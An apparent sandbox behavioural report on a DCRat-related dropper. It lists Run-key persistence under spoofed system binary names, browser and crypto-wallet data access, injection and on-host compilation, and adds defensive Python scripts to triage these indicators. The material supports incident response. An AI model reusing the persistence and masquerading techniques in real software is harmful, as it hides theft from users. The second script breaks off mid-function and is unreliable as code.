.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Music\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\DriversavessessionDlldhcp\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Music\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Common Files\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\twain_32\\sppsvc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\DriversavessessionDlldhcp\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\MSOCache\\All Users\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\MSOCache\\All Users\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bloxstrap = "\"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Common Files\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\twain_32\\sppsvc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
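Added triage helper for the table above; it is not part of the sandbox report or of the sample. It parses rows in the form the report uses, undoes the escaping the sandbox applies to REG_SZ data, and flags autostart images that borrow a Windows system binary's name while living outside that binary's real directory, or that sit where a standard user can write. The embedded rows are copied from this report; the directory allowlist is an assumption about a default install, and every name in the script is the author's.

```python
import re

# Rows copied from the "Adds Run key to start application" table of this
# report (a subset; the full table parses the same way).
SAMPLE_ROWS = r'''
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Music\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
'''

# One report row: "Set value (str) <key> = "<data>" <writer process> N/A".
# The key is matched lazily because value names may contain spaces.
ROW_RE = re.compile(
    r'^Set value \(str\) (?P<key>\\REGISTRY\\.+?) = "(?P<data>.*)" (?P<writer>\S+) N/A$'
)

# Where a default install keeps binaries with these names (assumption, lower
# case). Anything else using one of the names is masquerading.
SYSTEM_BINARIES = {
    "csrss.exe": {"c:\\windows\\system32"},
    "lsass.exe": {"c:\\windows\\system32"},
    "smss.exe": {"c:\\windows\\system32"},
    "services.exe": {"c:\\windows\\system32"},
    "sppsvc.exe": {"c:\\windows\\system32"},
    "dllhost.exe": {"c:\\windows\\system32", "c:\\windows\\syswow64"},
    "wscript.exe": {"c:\\windows\\system32", "c:\\windows\\syswow64"},
    "explorer.exe": {"c:\\windows", "c:\\windows\\syswow64"},
}


def unescape(data):
    # The sandbox renders REG_SZ data the way a JSON encoder would (\" and \\);
    # undo that, then drop the quotes the malware wrapped around the path.
    return data.replace('\\"', '"').replace("\\\\", "\\").strip('"')


def parse_row(row):
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    key = m["key"]
    hive = "HKLM" if key.upper().startswith("\\REGISTRY\\MACHINE") else "HKU"
    return {
        "hive": hive,
        "name": key.rsplit("\\", 1)[1],
        "image": unescape(m["data"]),
        "writer": m["writer"],
    }


def classify(entry):
    """Reasons an autostart entry deserves attention; empty means none tripped."""
    image = entry["image"].lower()
    directory, _, basename = image.rpartition("\\")
    reasons = []
    legit = SYSTEM_BINARIES.get(basename)
    if legit is not None and directory not in legit:
        reasons.append(f"{basename} masquerades as a Windows binary outside {sorted(legit)[0]}")
    under_system = directory == "c:\\windows" or directory.startswith(("c:\\windows\\", "c:\\program files"))
    if not under_system:
        reasons.append("image lives outside %SystemRoot% and Program Files (typically user-writable)")
    return reasons


def triage(rows_text):
    """Every Run-key row that trips at least one check, with the reasons.
    admin_write records that the writer already held rights to HKLM."""
    findings = []
    for line in rows_text.splitlines():
        entry = parse_row(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({**entry, "reasons": reasons, "admin_write": entry["hive"] == "HKLM"})
    return findings


def persistence_images(findings):
    """De-duplicated autostart images to collect and remove; the same binary is
    registered under both HKLM and the user hive, so key on the path."""
    return sorted({f["image"] for f in findings})


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f'{f["hive"]}\\...\\Run\\{f["name"]} -> {f["image"]}')
        for r in f["reasons"]:
            print("    -", r)
```

Run against the whole table, the de-duplicated image list is the cleanup checklist: each path appears under both hives, and the value names (csrss, lsass, smss, services, dllhost, sppsvc, explorer) are chosen so a glance at the Run key looks like normal system entries.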

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\nkeb0e.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2620 set thread context of 2228 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\817c8c8ec737a7 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\CSC47ECE852170F480E91EA1B84FE8DFF.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\Common Files\886983d96e3d3e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\6203df4a6bafc7 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Windows Portable Devices\dllhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\5940a34987c991 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files (x86)\Common Files\DESIGNER\CSCF7CCF5184CCC4DE8B28EE88B3840D7E9.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\dllhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files (x86)\Common Files\DESIGNER\lsass.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\Common Files\csrss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\f76f1ed.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\DigitalLocker\it-IT\lsm.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Windows\DigitalLocker\it-IT\101b941d020240 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Windows\AppPatch\ja-JP\CSCC375D023683141EC9126F98C4EDA9BAD.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Installer\f76f1ed.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AppPatch\ja-JP\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\twain_32\0a1fd5f707cd16 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSIFA4C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFC22.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\AppPatch\ja-JP\smss.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\twain_32\sppsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Registration\CRMLog\886983d96e3d3e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\twain_32\sppsvc.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
File opened for modification C:\Windows\Installer\MSIFBA5.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\twain_32\CSC9A457BE89CBC4F64AC68B4421A86AF34.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Registration\CRMLog\csrss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\AppPatch\ja-JP\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
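Added example, not from the report or the sample: a parser for the rows in the "Drops file in ..." tables above that does two things a responder wants from them. It pairs each CSC<hex>.TMP scratch file csc.exe wrote with the PE it emitted into the same directory (binaries compiled on the victim, so there is no pre-existing hash to block), and it lists PE files created under %SystemRoot% or Program Files by anything other than the installers that normally write there. The embedded rows are copied from this report; the PE extension list and the writer allowlist are assumptions.

```python
import re
from collections import defaultdict

# Rows copied from the "Drops file in ..." tables of this report (subset).
SAMPLE_ROWS = r'''
File created \??\c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\nkeb0e.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Windows Portable Devices\dllhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\dllhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\5940a34987c991 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Installer\f76f1ed.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFA4C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
'''

# One row: "<operation> <path> <writer process> N/A"; the path may contain
# spaces, the writer path in this report does not.
ROW_RE = re.compile(r"^(?P<op>File created|File opened for modification) (?P<path>.+?) (?P<writer>\S+) N/A$")

PE_EXTENSIONS = (".exe", ".dll", ".sys", ".scr")          # assumption: what counts as a PE drop
PRIVILEGED_ROOTS = ("c:\\windows", "c:\\program files")   # directories a standard user cannot write
EXPECTED_WRITERS = {"msiexec.exe", "trustedinstaller.exe", "tiworker.exe"}  # assumption


def normalize(path):
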